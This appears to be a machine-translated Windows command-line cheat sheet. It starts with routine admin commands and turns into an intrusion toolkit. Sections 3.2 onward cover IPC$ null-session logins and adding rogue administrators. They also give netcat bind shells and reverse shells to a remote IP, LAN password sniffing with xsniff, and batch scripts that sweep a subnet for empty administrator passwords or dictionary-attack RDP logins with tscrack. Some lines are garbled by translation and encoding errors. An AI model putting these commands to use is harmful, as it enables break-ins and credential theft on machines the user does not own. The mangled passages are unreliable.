A command prompt is a working prompt in an operating system that prompts for command entry. Command prompts vary in different operating system environments.
In the windows environment, the command line program is cmd.exe, a 32-bit command line program, Microsoft Windows system based on the command interpreter program on Windows, similar to the Microsoft DOS operating system.
Additional reprints.[win+instruction]
I. Starting the CMD Command Prompt Controller
“Start” ¡ú “Run” ¡ú type “cmd” enter; or: win + R (two keys at the same time) to open the “Run “window → type “cmd” enter.
Second, my own commonly used CMD commands
mstsc: opens a remote desktop connection.
services.msc: opens the local service settings.
notepad: Open Notepad.
control: opens the control panel.
regedit: opens the registry list editor.
ncpa.cpl: windows 10 network services on (or win+X)
Windows CMD commands
3.1 Systems
1.gpedit.msc—– Group Policy
2. sndrec32——- recorder
3. Nslookup——- IP Address Detector is a command-line tool that monitors DNS servers on a network for proper domain name resolution. It is available in Windows NT/2000/XP, but is not integrated in Windows 98.
4. explorer ——- opens Explorer
5. logoff——— logoff command
6. shutdown——-60 seconds countdown shutdown command
7. lusrmgr.msc—- local users and groups
8. services.msc – local service settings
9. oobe/msoobe /a—- check whether XP is activated or not
10. notepad——– open notepad
11. cleanmgr ——- defragmentation
12. net start messenger—-
13. compmgmt.msc — computer management
14. net stop messenger—– Stop the messenger service
15. conf———– Start netmeeting
16. dvdplay ——–DVD player
17. charmap——– startup character mapping table
18. diskmgmt.msc – disk management utility
19. calc———– launch calculator
20. dfrg.msc——- disk defragmenter
21. chkdsk.exe—–Chkdsk disk checking
22. devmgmt.msc- Device Manager
23. regsvr32 /u *.dll—- stops the dll file from running
24. drwtsn32—— System Doctor
25. rononce -p—- Power off in 15 seconds
26. dxdiag——— checking DirectX information
27. regedt32——- registry editor
28. Msconfig.exe — system configuration utility program
29. rsop.msc——- group policy result set
30. mem.exe——– shows memory usage
31. regedit.exe—- registry
32. winchat——–XP comes with a LAN chat
33. progman ——– program manager
34. winmsd ——— system information
35. perfmon.msc —- computer performance monitoring program
36. winver——— check Windows version
37. sfc /scannow—– scanning for errors and recovery
38. taskmgr—– task manager (2000/xp/2003)
40. wmimgmt.msc—- opens windows management architecture (WMI)
41. wupdmgr——–windows update program
42. wscript——–windows script host settings
43. write———- writing tablet
45. wiaacmgr ——- Scanner and Camera Wizard
46. winchat——–XP comes with LAN chatting
49. mplayer2——- Simple widnows media player
50. mspaint ——– drawing tablet
51. mstsc———- remote desktop connection
53. magnify——– magnifying glass utility program
54. mmc———— opens the console
55. mobsync——– synchronization command
57. iexpress ——- Trojan Horse Bundle, comes with the system.
58. fsmgmt.msc—– Shared Folder Manager
59. utilman ——– accessibility manager
61. dcomcnfg——- opens the system component service
62. ddeshare——- open DDE share settings
110. osk———— opens the on-screen keyboard
111. odbcad32——-ODBC Data Source Manager
112. oobe/msoobe /a—- check if XP is activated or not
68. ntbackup——- system backup and restore
69. narrator ——- screen “narrator”
70. ntmsmgr.msc—- Mobile Storage Manager
71. ntmsoprq.msc — mobile storage manager operation request
72. netstat -an—-(TC) command checks the interface
73. syncapp——– create a briefcase
74. sysedit ——– system configuration editor
75. sigverif ——- document signature verification program
76. ciadv.msc —— indexing service program
77. shrpubw——– create shared folders
78. secpol.msc—– local security policy
79. syskey——— system encryption, once encrypted can not be unencrypted, double password to protect windows xp system
80. services.msc-Local Service Settings
81. Sndvol32——- volume control program
82. sfc.exe ——– system file checker
83. sfc /scannow-windows file protection
84. ciadv.msc —— indexing service program
85. tourstart ——xp profile (the roaming xp program that appears after the installation is complete)
86. taskmgr——– taskmgr
87. eventvwr——- event viewer
88. eudcedit ——- word creation program
89. compmgmt.msc — computer management
90. packager——- object packaging program
91. perfmon.msc —- computer performance monitoring program
92. charmap——– startup character mapping table
93. cliconfg——-SQL SERVER CLIENT NETWORK UTILITIES
94. Clipbrd ——– clipboard viewer
conf———– to start netmeeting
96. certmgr.msc—- certificate management utility program
97. regsvr32 /u *.dll—- stops the dll file from running
98. regsvr32 /u zipfldr.dll—— cancel ZIP support
99. cmd.exe——–CMD Command Prompt
3.2 net
net use ipipc$ ” ” /user:” ” Create IPC null link
net use ipipc$ “password” /user: “username” Creating IPC non-empty links
net use h: ipc$ “password” /user: “username” Directly logging in and mapping the other C: to local as H:.
net use h: ipc$ Login to map the other C: to local as H:.
net use ipipc$/del To delete an IPC link
net use h: /del Deletes the mapping of the other side to the local side as H:.
net user User name Password /add Create user
net user guest /active:yes Activates a guest user
net user See what users are available
net user Account name View account properties
net localgroup administrators username /add Add the “user” to administrators to give it administrator privileges
net start to see what services are turned on
net start service name Starts a service; (e.g., net start telnet, net start schedule)
net stop Service name Stop a service
net time Destination ip View opponent’s time
net time target ip /set Set the local computer time synchronized with the time of the host of “target ip”, add the parameter /yes to cancel the confirmation message.
net view to see which shares are turned on on the local LAN
net view ip to see which shares are open on the other LAN
net config Displays system network settings
net logoff Disconnected shares
net pause Service name Pause a service
net send ip “text message” Sends a message to the other party.
net ver Type and information about the network connection being used on the LAN
net share View locally enabled shares
net share ipc$Enables ipc$sharing
net share ipc$/del Deletes the ipc$share
net share c$ /del Delete C: share
net user guest 12345 Change the password to 12345 after logging in as guest.
net password Password Change the system login password
netstat -a to see what ports are open, commonly used netstat -an
netstat -n View network connectivity on a port, commonly used netstat -an
netstat -v to see what’s going on
netstat -p protocol name Example: netstat -p tcq/ip Viewing the usage of a protocol
netstat -s View all protocol usage in use
nbtstat -A ip If one of the ports 136 to 139 of the other party is open, you can check the username of the other party’s most recent login.
tracert -argument ip(or computer name) Trace route (packet), argument: “-w number” is used to set the timeout interval.
3.3 Computer parameters / processes / IP / files…
ping ip(or domain name) sends the default size of 32 bytes of data to the other host, parameters: “-l[space] packet size”; “-n number of times to send data”; “-t ” means ping all the time.
ping -t -l 65550 ip ping of death (sending a file larger than 64K and pinging it all the time makes it a ping of death)
ipconfig (winipcfg) for windows NT and XP (windows 95 98) to view the local ip address, ipconfig can be used with the parameter “/all” to display all the configuration information
tlist -t displays processes in a tree line list (an additional tool for the system, not installed by default, in the Support/tools folder of the installation directory)
kill -F process name with the -F parameter to force the end of a process (for the system’s additional tools, the default is not installed, in the installation directory of the Support/tools folder)
del -F file name plus -F parameter can delete read-only files, /AR, /AH, /AS, /AA respectively means to delete read-only, hidden, system, archive files, /A-R, /A-H, /A-S, /A-A that is, in addition to read-only, hidden, system, archive files other than deletion. For example, “DEL/AR.” indicates that all read-only files in the current directory are deleted, “DEL/A-S.” means to delete all files in the current directory except system files
del /S /Q Directory or use: rmdir /s /Q Directory /S to delete the directory and all subdirectories and files under the directory. At the same time, you can use the parameter /Q to cancel the system confirmation and delete the directory directly. (Both commands have the same function)
move disk path to move the file name of the path to store the file after the move file name to move the file, with the parameter /y will cancel the confirmation to move the directory of the existence of the same file on the prompt to directly cover the
fc one.txt two.txt > 3st.txt Compare the two files and output the differences to the 3st.txt file. “>” and “> >” are redirection commands.
at id number Starts a registered scheduled task.
at /delete stops all scheduled tasks, with the /yes parameter it stops them without confirmation.
at id number /delete Stops a registered scheduled task.
at View all scheduled tasks
at ip time Program name (or a command) /r Run a program on the other side at a certain time and restart the computer
finger username @host See which users have logged in recently
telnet ip port Far and log in to the server, the default port is 23
open ip Connect to IP (a telnet post-login command)
Telnet Typing telnet directly on the local machine will enter the local telnet.
copy pathfilename1 pathfilename2 /y copy file1 to the specified directory as file2, with the parameter /y, you will also cancel the confirmation that you want to rewrite an existing directory file.
copy c:srv.exe ipadmin$ Copy local c:srv.exe to each other’s admin
copy 1st.jpg/b+2st.txt/a 3st.jpg will 2st.txt content hiding to 1st.jpg to generate 3st.jpg new file, note: 2st.txt file header to empty three rows, parameters: /b refers to the binary file, /a refers to the ASCLL format file
copy ipadmins v v . e x e c : or : c o p y i p a d m i n exe c: or copyipadminsvv.exec:or:copyipadmin. Copy the srv.exe file (all files) under the other admini$ share to local C:
xcopy File or directory tree to be copied Destination directory name Copying files and directory trees with the /Y parameter will not prompt to overwrite the same files
The /e parameter is used to copy the directory with its subdirectories to the destination.
tftp -i own ip (use the IP of the meat machine when using it as a springboard) get server.exe c:server.exe After logging in, download server.exe from the “ip” to the target host, c:server.exe Parameters: -i refers to the transmission in binary mode, such as Parameters: -i means transfer in binary mode, such as transferring exe file, if not add -i, then transfer in ASCII mode (transferring text file mode).
tftp -i Other IP put c:server.exe After logging in, upload local c:server.exe to the host.
ftp ip port Used for uploading files to the server or performing file operations, the default port is 21. bin means binary transmission (for executable files); the default is ASCII transmission (for text files).
route print displays the IP route, which will mainly show the network address Network addres, subnet mask Netmask, gateway address Gateway addres, interface address Interface
arp View and process the ARP cache, ARP stands for name resolution and is responsible for resolving an IP into a physical MAC address. arp -a will show the full information
start Program name or command /max or /min Opens a new window and maximizes (minimizes) a program or command.
mem View cpu usage
attrib file name (directory name) View attributes of a file (directory)
attrib filename -A -R -S -H or +A +R +S +H Removes (adds) archive, read-only, system, hidden attributes from a file; + adds to an attribute
dir to view files, parameters: /Q to display files and directories belong to which user of the system, /T A to display the last time the file was accessed, /T:W last time it was modified.
date /t, time /t Use this parameter, i.e. “DATE/T”, “TIME/T” to display only the current date and time, without having to enter a new date and time.
set Specify environment variable name = character to assign to variable Set environment variable
set Displays all current environment variables
set p (or other character) Displays all environment variables that currently begin with the character p (or other character).
pause pauses the batch program and displays: Please press any key to continue…
if Performs conditional processing in a batch program (see if commands and variables for more information).
goto tag directs cmd.exe to the line with the tag in the batch program (the tag must be on a separate line and begin with a colon, e.g., “:start” tag)
call path batch file name Calls another batch program from a batch program (see call /? for more information)
for executes a specific command for each file in a group (see for commands and variables for more information).
echo on or off Turns echo on or off, using echo only without parameters shows the current echo settings.
echo Message Displays a message on the screen
echo info >> pass.txt Save the “info” to pass.txt file.
findstr “Hello” aa.txt Find the string hello in the file aa.txt
find filename Find a file
title Title name Changes the CMD window title name.
color color value set cmd console foreground and background color; 0=black, 1=blue, 2=green, 3=light green, 4=red, 5=purple, 6=yellow, 7=white, 8=gray, 9=pale blue, A=pale green, B=pale light green, C=pale red, D=pale purple, E=pale yellow, F=bright white
prompt name Change the command prompt displayed by cmd.exe (change C to: EntSky )
ver Displaying version information in a DOS window
winver pops up a window showing version information (memory size, system version, patch version, computer name)
format disk /FS: type Format the disk, type: FAT, FAT32, NTFS, example: Format D: /FS:NTFS
md directory name Create directory
replace Source file Directory of the file to be replaced Replace file
ren Original filename New filename Rename filename
tree displays the directory in a tree structure, with the -f parameter it lists the names of the files in the first folder.
type filename Displays the contents of a text file
more File name Display output files screen by screen
doskey Command to lock = character
doskey To unlock commands = lock commands provided for DOS (edit command line, re-invoke win2k commands, and create macros). E.g., lock dir command: doskey dir=entsky (can’t use doskey dir=dir); unlock: doskey dir=
taskmgr Calls up the task manager
chkdsk /F D: checks disk D and displays a status report; adds /f and fixes errors on the disk
tlntadmn telnt serviceadmn,type tlntadmn to select 3, then select 8, you can change the default port 23 of the telnet service to any other port.
exit Exit the cmd.exe program or the current, with the parameter /B is to exit the current batch script rather than cmd.exe
path The filename of the executable file Sets a path to the executable file.
cmd starts a win2k command interpretation window. Parameters: /eff, /en disable, enable command expansion; see cmd /?
regedit /s registry file name Import the registry; the parameter /S refers to quiet mode import without any prompt;
regedit /e registry file name Export registry
cacls filename Parameters Displays or modifies file access control lists (ACLs) – for NTFS format when. Parameters: /D username:Set to deny access to a user; /P username:perm Replace access for a specified user; /G username:perm Grant access to a specified user; Perm can be: N none, R read, W write, C change (write), F full control; Example: cacls D: est.txt /D pub Set d: est.txt to deny access to the pub user access.
cacls filename View a list of user permissions for accessing the file
REM text content Add comment to batch file
netsh View or change the local network configuration
3.4 IIS Service Commands
iisreset /reboot Reboot the win2k computer (but a message indicating that the system will reboot appears)
iisreset /start or stop Starts (stops) all Internet services.
iisreset /restart Stops and then restarts all Internet services.
iisreset /status Displays the status of all Internet services.
iisreset /enable or disable Enables (disables) the restart of Internet services on the local system
iisreset /rebootonerror When starting, stopping, or restarting Internet services, reboots if an error occurs
iisreset /noforce will not force termination of Internet service if it cannot be stopped.
iisreset /timeout Val does not stop the Internet service when the timeout (in seconds) is reached, and the computer will reboot if the /rebootonerror parameter is specified. The default values are 20 seconds for restart, 60 seconds for stop, and 0 seconds for reboot.
3.5 FTP commands: (detailed description follows)
The command line format for ftp is.
ftp -v -d -i -n -g[hostname] -v Displays all response messages from the remote server.
-d Use the debugging method.
-n Restrict automatic ftp login, i.e. do not use .netrc files.
-g Cancel the global filename.
help [command] or ? [command] to view the command description
bye or quit Terminate the host FTP process and exit the FTP management mode.
pwd List the current remote host directory
put or send local filename [filename uploaded to host] Transfers a local file to a remote host
get or recv [remote host filename] [filename after downloading locally] transfer from remote host to local host
mget [remote-files] Receive a batch of files from a remote host to the local host
mput local-files Transfers a batch of files from the local host to the remote host.
dir or ls [remote-directory] [local-file] Lists files in the current remote host directory. If there is a local file, write the result to the local file.
ascii Sets file transfer in ASCII (default)
bin or image Sets the file to be transferred as a binary.
bell Alarm for each completed file transfer
cdup Return to previous directory
close Interrupts the ftp session with the remote server (corresponds to open).
open host[port] Create a connection to the specified ftp server, you can specify the connection port.
delete Deletes a file from the remote host.
mdelete [remote-files] Delete a batch of files
mkdir directory-name Create a directory in the remote host
rename [from] [to] Changes the name of a file on the remote host.
rmdir directory-name Removes the directory from the remote host.
status Displays the current FTP status
system Displays the remote host system type
user user-name [password] [account] Re-login to the remote host with a different user name.
open host [port] Re-establishing a new connection
prompt Interactive prompt mode
macdef Define macro commands
lcd change the current localhost working directory, if default, go to the current user’s HOME directory
chmod Change file permissions on remote hosts
case When ON, the file name copied to the local machine with the MGET command is converted to lowercase letters.
cd remote-dir Enter the remote host directory
cdup Enter the parent directory of the remote host directory
! Execute an interactive shell on the local machine, exit to return to the ftp environment, e.g. !ls*.zip.
3.6 MYSQL Commands
mysql -h host address -u username -p password Connect to MYSQL; if MYSQL has just been installed, the superuser root has no password.
(Example: mysql -h110.110.110.110 -Uroot -P123456)
(Note: u and root can be used without spaces, and the others are the same)
exit Exit MYSQL
mysqladmin -u username -p old password new password change password
grant select on Database. * to username@login host identified by “password”; Add new user. (Note: Unlike the above, the following commands are followed by a semicolon as a command terminator because they are commands in a MYSQL environment)
show databases; Show the list of databases. There are only two databases at the beginning: mysql and test. mysql is a very important library that contains system information about MYSQL, and it is actually the library that we use to change passwords and add new users.
use mysql;
show tables; show tables in library
describe table name; displays the structure of the table.
create database database name; Build a library
use Library name;
create table table name (list of field settings); create table
drop database database name;
drop table table name; delete library and table
delete from table name; Empty the table.
select * from table name; Show records in table
mysqldump –opt school>school.bbb Backup database: (Command executed in DOS mysqlin directory); Note: Backup database school to school.bbb file, school.bbb is a text file, file name optional, open to see you will have a new discovery.
3.7 New commands under win2003 system (practical part):
shutdown /parameters Shut down or reboot the local or remote host.
Parameter Description: /S Shut down the host, /R Reboot the host, /T Digital Set the time of delay, range between 0 and 180 seconds, /A Cancel power on, /M //IP Specified remote host.
Example: shutdown /r /t 0 Restart the localhost immediately (no delay)
taskill /parameters process name or process pid Terminates one or more tasks and processes.
Parameters: /PID The pid of the process to be terminated, you can use the tasklist command to get the pid of each process, /IM The process name of the process to be terminated, /F To force the termination of the process, /T To terminate the specified process and the sub-processes started by it.
tasklist Displays the processes, services, and process identifiers (PIDs) of each process of the service currently running on the local and remote hosts.
Parameters: /M lists the dll files loaded by the current process, /SVC shows the service corresponding to each process, without parameter, it only lists the current process.
3.8 Basic Commands for Linux Note: Case sensitive.
uname Displays version information (same as ver for Win2K)
dir shows files in current directory, ls -al shows hidden files (same as Win2K dir).
pwd Query the location of the current directory
cd cd … returns to the previous directory, note the space between cd and …. cd / returns to the root directory.
cat File name View file contents
cat >abc.txt Write to the abc.txt file.
more File name Displays a text file in a page-by-page format.
cp copy file
mv Move File
rm filename Delete files, rm -a Directory name Delete directories and subdirectories
mkdir directory name create directory
rmdir Removes subdirectories with no documents in them.
chmod Sets file or directory access permissions.
grep Find strings in archives
diff archive file comparison
find File Search
date Current date and time
who looks up who is currently using the same machine as you and where and when they logged in.
w Enquire about the details of the person currently on board
whoami View your account name
groups View someone’s Groups
passwd Change password
history See the commands you have given
ps show process status
kill Stop a process
gcc is commonly used by hackers to compile files written in C.
su privileges to the specified user
telnet IP telnet connection to the other host (same as win2k), when bash$ appears it means the connection is successful.
ftp ftp connection on a server (same as win2k)
3.9 Batch commands and variables
3.9.1: The for Command and Variables Basic Format
FOR /parameters %variable IN (set) DO command [command_parameters] %variable: Specifies a single letter replaceable parameter, e.g., %i, whereas a variable is specified with: %%i, and a variable is called with: %i%, and variables are case sensitive (%i is not equal to %I).
batch each time you can handle the variables from %0-%9 a total of 10, of which %0 default to the use of batch file name, %1 default to the use of this batch of the first value entered, the same: %2-%9 refers to the input of the second to the ninth value; Example: net use ip ipc$ pass /user:user where ip is %1, pass is %2, and user is %3.
(set) user.txt) and (1 1 254)(1 -1 254),{ “(1 1 254)” the first “1” refers to the starting value, the second “1” refers to the increase, and the third “254” refers to the ending value, i.e.: from 1 to 254; “(1 -1 254) ” means: from 254 to 1 }
command: Specify the command to be executed on the first file, such as: net use command; if you want to execute more than one command, add: & to separate the commands.
command_parameters: Specify parameters or command line switches for a particular command.
IN (set): means to take the value in (set); DO command: means to execute the command.
Parameters: /L means to use incremental form { (set) is incremental form }; /F means to keep taking values from the file until it is finished { (set) is a file, e.g. (d:pass.txt) }.
Usage examples:
@echo off
echo Format: test.bat..* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%G /user:administrator | find Command completed successfully >>test.txt
Save as test.bat Explanation: Try to establish IPC$ connection with empty administrator password for 254 IPs of a specified Class C network segment in turn, and if successful, save the IP in test.txt.
/L means in incremental form (i.e., from 1-254 or 254-1); the first three digits of the input IP:.. * is the default %1 for the batch; %%G is a variable (the last bit of the ip); & is used to separate the two commands echo and net use; | means that after creating the ipc$, use find to see if there is a “successful completion of the command” message in the result; %1.%%G is the full IP address; (1 1 254) means the start value, the growth amount, and the end value.
@echo off
echo Format: ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
Save as: ok.exe Description: After entering an IP, use the user password in the dictionary file d user.dic until the values in the file are taken. %%i is the user name; %1 is the IP address entered (default).
3.9.2: if Commands and Variables Basic Format
IF [not] errorlevel number Command Statement Specifies that the condition is true if an exit code equal to or greater than the specified number is returned at the end of the program run.
Example: IF errorlevel 0 command means that if the value returned by the program after execution is 0, then the command that follows will be executed; IF not errorlevel 1 command means that if the value returned at the end of the program execution is not equal to 1, then the command that follows will be executed.
0 means detected and successfully implemented (true); 1 means not detected, not implemented (false).
IF [not] String 1 == String 2 Command Statement If the specified text strings match (i.e., String 1 is equal to String 2), executes the following commands.
Example: “if “%2%”==”4″ goto start” means: if the second variable entered is 4, execute the following commands (note: call the variable with the %variable name% and add ” “)
IF [not] exist filename Command Statement If the specified filename exists, executes the command that follows.
Example: “if not nc.exe goto end” means: if nc.exe file is not found, jump to “:end” label.
IF [not] errorlevel number Command statement else Command statement or IF [not] string1==string2 Command statement else Command statement or IF [not] exist filename Command statement else Command statement Plus: else Command statement refers to the command after else: when the previous condition does not hold, it refers to the command after else. Note: else must be on the same line as if to be effective. When there is a del command, you need to enclose all the contents of the del command with < >, because the del command can only be executed on a separate line, and after using < >, it is a separate line; for example: “if exist test.txt.
3.10 System External Commands (nc.exe)
Note: Commands external to the system (all require the download of related tools)
Swiss Army Knife: nc.exe
Parameter Description:
-h View help information
-d Background mode
-e prog program redirects, executes as soon as it connects [danger]
-i secs delay interval
-l Listener mode for inbound connections
-L listener mode, continue to listen even after the connection is closed until CTR+C
-n IP address, not domain name
-o film records hexadecimal transfers
-p[space] port Local port number
-r Random local and remote ports
-t Use Telnet interaction
-u UDP mode
-v Detailed output, with -vv will be more detailed
-w digital timeout delay interval
-z Turns inputs and outputs off (for anchor sweeping).
3.10.1 Basic Usage:
nc -nvv 192.168.0.1 80 Connect to port 80 on host 192.168.0.1
nc -l -p 80 Opens local TCP port 80 and listens on it.
nc-nvv-w2-z 192.168.0.1 80-1024 Sweep anchor port 80-1024 of 192.168.0.1
nc -l -p 5354 -t -e c:winntsystem32cmd.exe Bind the remote host’s cmdshell to the remote’s TCP port 5354
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 bang the cmdshell of the remote host and reverse the connection to port 5354 of 192.168.0.2
3.10.1 Advanced Usage:
nc -L -p 80 as a honeypot 1: open and keep listening on port 80 until CTR+C
nc -L -p 80 > c:log.txt as honeypot 2: open and keep listening on port 80 until CTR+C, and output the result to c:log.txt
nc -L -p 80 < c:honeyport.txt as honeypot 3-1: open and keep listening to port 80 until CTR+C, and send the contents of c:honeyport.txt into the pipeline, can also play a role in the transfer of documents
type.exe c:honeyport | nc -L -p 80 as a honeypot with 3-2: open and keep listening to port 80 until CTR + C, and c:honeyport.txt in the contents of the pipeline, can also play a role in the transfer of documents
Locally: nc -l -p local port
On the other host: nc -e cmd.exe local IP -p local port *win2K
nc -e /bin/sh local IP -p local port *linux,unix Reverse connection to break through the other host’s firewall
locally: nc -d -l -p local port < path and name of file to be transferred
On the other host, use: nc -vv Local IP Local port > Path and name of the stored file to transfer the file to the other host.
Remarks:
| Pipeline Commands
< or > redirects the command. “<“, e.g., tlntadmn < test.txt means to assign the contents of test.txt to the tlntadmn command
@ means execute the command after @, but will not be displayed (background execution); example: @dir c:winnt >> d:log.txt means: background execution of dir, and the result is stored in d:log.txt
Difference between > and >> “>” means: override; “>>” means: save to (add to).
Such as: @dir c:winnt >> d:log.txt and @dir c:winnt > d:log.txt two commands were executed twice compared to see: with >> is the result of the second are saved, while with: > is only the result of the first, because the second results of the first covered.
3.11 Point 8: (xscan.exe)
Scanning tool: xscan.exe
basic format
xscan -host <start IP>[-<end IP>] <inspection item> [other options] Scans all hosts in the “start IP to end IP” segment.
xscan -file <host list filename> <inspection item> [Other options] Scan all hosts in the “host IP list filename”.
Testing Program
-active Detects if the host is alive
-os Detect remote OS type (via NETBIOS and SNMP protocols)
-port Detects the port status of common services
-ftp Detecting FTP weak passwords
-pub Detecting FTP service write privileges for anonymous users
-pop3 Detecting weak POP3-Server passwords
-smtp Detects SMTP-Server Vulnerabilities
-sql Detecting weak passwords on SQL-Server
-smb Detecting weak passwords on NT-Server
-iis Detecting IIS Encoding/Decoding Vulnerabilities
-cgi detects CGI vulnerabilities
-nasl Load the Nessus attack script.
-all Test all of the above
Other Options
-i Adapter number Sets the network adapter, <adapter number> can be obtained with the “-l” parameter.
-l Show all network adapters
-v Display detailed scanning progress
-p Skip unresponsive hosts
-o Skip hosts with no open ports detected
-t Concurrent Threads,Concurrent Hosts Specify the maximum number of concurrent threads and concurrent hosts, the default is 100,10.
-log filename Specify the scan report filename (suffix: TXT or HTML format file)
3.11.1 Examples of usage
xscan -host 192.168.1.1-192.168.255.255 -all -active -p Detect all vulnerabilities on hosts in the 192.168.1.1-192.168.255.255 segment, skipping unresponsive hosts
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o Detect the standard port status of hosts in the 192.168.1.1-192.168.255.255 segment, NT weak password users, maximum number of concurrent threads is 150, skip hosts that do not detect open ports
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o Detect the standard port status of all hosts listed in the “hostlist.txt” file, CGI vulnerability, the maximum number of concurrent threads is 200, and at the same time, up to 5 hosts are detected. hosts at the same time, show the detailed detection progress, skip the hosts with no open ports detected.
3.12 IX: (xsniff.exe)
Command line sniffer: xsniff.exe
Capture FTP/SMTP/POP3/HTTP protocol passwords on the LAN
Parameter description
-tcp Output TCP datagrams
-udp Output UDP datagrams
-icmp Output ICMP datagram
-pass Filtering password information
-hide Run in background
-host Resolve hostname
-addr IP address Filter IP addresses
-port Port Filtering ports
-log filename Save output to file
-asc Output in ASCII
-hex Output in hexadecimal
3.12.1 Examples of usage
xsniff.exe -pass -hide -log pass.log Runs in the background to sniff passwords and save them in the pass.log file.
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 Sniffs 192.168.1.1 and filters tcp and udp messages and outputs them in ASCII format.
Terminal Services Password Cracking: tscrack.exe
Parameter description
-h Display help for use
-v Display version information
-s Type decryption capability on the screen
-b Sound when password is wrong
-t Issue multiple connections at the same time (multithreading)
-N Prevent System Log entries on targeted server
-U Uninstall Remove tscrack Component
-f Use the password after -f
-F Interval (frequency)
-l Use the username after -l
-w Use the password dictionary after -w
-p Use the password after -p
-D Login Main Page
3.12.2 Examples of usage
tscrack 192.168.0.1 -l administrator -w pass.dic Remotely break the login password of the host’s administrator with a password dictionary file.
tscrack 192.168.0.1 -l administrator -p 123456 Remotely logs in to the administrator user at 192.168.0.1 with password 123456
@if not exist ipcscan.txt goto noscan
@for /f “tokens=1 delims= ” %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①Save as 3389.bat) (Assuming that SuperScan or other anchor scanners have been used to scan the IP list of a number of hosts with 3389 in the file 3389.txt)
3389.bat means: take an IP from the 3389.txt file, then run hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(② save as hack.bat) (run 3389.bat on OK, and 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe in the same directory; you can wait for the result)
hack.bat means: run tscrack.exe to break the administrator password of all hosts in 3389.txt with dictionary and save the cracking result in rouji.txt file.
3.13 Other
Shutdown.exe
Shutdown IP address t:20 20 seconds after the other side of the NT automatically shut down (Windows 2003 system comes with a tool, under Windows 2000 into the use of this tool will have to download in order to use. In the previous Windows 2003 DOS commands are described in detail.)
fpipe.exe (TCP port redirection tool)
This is explained in detail in the second article (port redirection to bypass firewalls)
fpipe -l 80 -s 1029 -r 80 When someone sweeps your port 80, the result will be exactly the same host information.
Fpipe -l 23 -s 88 -r 23 Destination IP After redirecting the Telnet request on port 23 from the local machine to the destination IP, the request is sent to port 23 of the destination IP via port 88. (When you establish Telnet with the target IP, the local computer uses port 88 to connect to it.) Then: Telnet 127.0.0.1 (local IP) directly to port 23 of the target IP.
OpenTelnet.exe (remote open telnet tool)
opentelnet.exe IP Account Password ntlm Authentication Method Telnet port (no need to upload ntlm.exe to destroy Microsoft’s authentication method) Directly after the remote open each other’s telnet service, you can use telnet ip to connect to each other.
NTLM authentication method: 0: No NTLM authentication; 1: Try NTLM authentication first, if it fails, then use the username and password; 2: Use only NTLM authentication.
ResumeTelnet.exe (another tool that comes with OpenTelnet)
resumetelnet.exe IP Account Password After connecting to the other party with Telnet, use this command to restore the other party’s Telnet settings and shut down the Telnet service at the same time.
3.14 FTP Commands in Detail
FTP command is one of the Internet users use the most frequent commands, familiar with and flexible application of FTP internal commands, you can greatly facilitate the user, and receive twice the result with half the effort. If you want to learn to use for background FTP downloads, then you must learn FTP commands.
The command line format for FTP is:
ftp -v -d -i -n -g [hostname], where
-v Display all response messages from the remote server
-n Restrict automatic login for ftp, i.e., don’t use; .n etrc file;
-d Use the debugging method;
-g Cancel the global filename.
The internal commands used by FTP are as follows (center brackets indicate optional).
1.! [cmd[args]]: Execute interactive shell in local machine, exit back to ftp environment, e.g.: !ls*.zip
2.$ macro-ame[args]: Execute macro-name.
3. account[password]: Provides the additional password required to access system resources after a successful login to the remote system.
4. append local-file[remote-file]: appends a local file to the remote system host, if the remote system file name is not specified, the local file name is used.
5. ascii: Use ascii type transmission method.
6. bell: The computer rings once after each command is executed.
7.bin: Use the binary file transfer method.
8. bye: Exit the ftp session process.
9.case: convert upper case to lower case letters in remote host filenames when using mget.
10. cd remote-dir: Enter the remote host directory.
11. cdup: Go to the parent directory of the remote host directory.
12. chmod mode file-name: Set the access mode of remote host file-name to mode, such as: chmod 777 a.out.
13. close: interrupts the ftp session with the remote server (corresponds to open).
14 .cr: Converts carriage returns to line feeds when transferring files using the asscii method.
15. delete remote-file: Delete a remote host file.
16. debug[debug-value]: set the debugging mode, display each command sent to the remote host, such as: deb up 3, if set to 0, means cancel debug.
17. dir[remote-dir][local-file]: displays the remote host directory and stores the result in a local file.
18.disconnection: close.
19. form format: set the file transfer method to format, default is file method.
20. get remote-file[local-file]: Transfer remote-file from remote host to local-file on local hard disk.
21. glob: set the filename extension for mdelete, mget, mput, no filename extension by default, same as the -g parameter on the command line.
22. hash: For every 1024 bytes transmitted, a hash symbol (#) is displayed.
23. help[cmd]: displays help information for the ftp internal command cmd, e.g.: help get.
24. idle[seconds]: Set the hibernation timer of the remote server to [seconds] seconds.
25. image: set the binary transmission mode (same as binary).
26. lcd[dir]: switches the local working directory to dir.
27. ls[remote-dir][local-file]: displays the remote directory remote-dir and stores it in the local file local-file.
28. macdef macro-name: Define a macro, the macro definition ends when an empty line under macdef is encountered.
29. mdelete[remote-file]: Deletes a remote host file.
30.mdir remote-files local-file: similar to dir, but can specify more than one remote file, such as : mdir.o..zipoutfile 。
31.mget remote-files: Transfer multiple remote files.
32. mkdir dir-name: Create a directory in the remote host.
33.mls remote-file local-file: same as nlist but multiple file names can be specified.
34. mode[modename]: set the file transfer mode to modename, default is stream.
35.modtime file-name: Displays the last modification time of the remote host file.
36.mput local-file: transfers multiple files to a remote host.
37.newer file-name: Retransmits file-name in the remote machine if it was modified more recently than the file with the same name on the local hard disk.
38.nlist[remote-dir][local-file]: displays a list of files in the remote host’s directory and deposits them in the local-file on the local hard disk.
39. nmap [inpattern outpattern]: set the filename mapping mechanism, so that when the file transfer, some characters in the file are converted to each other, such as: nmap $1.$2.$3 [$1, $2]. [$2, $3], then transfer file a1.a2.a3, the file name becomes a1, a2. This command is especially suitable for remote hosts for the case of non-UNIX machines.
40. ntrans[inchars[outchars]]: set the translation mechanism for filename characters, e.g., ntrans1R, the filename LLL will become RRR.
41. open host[port]: establishes a connection to the specified ftp server, can specify the connection port.
42. passive: Enter passive transmission mode.
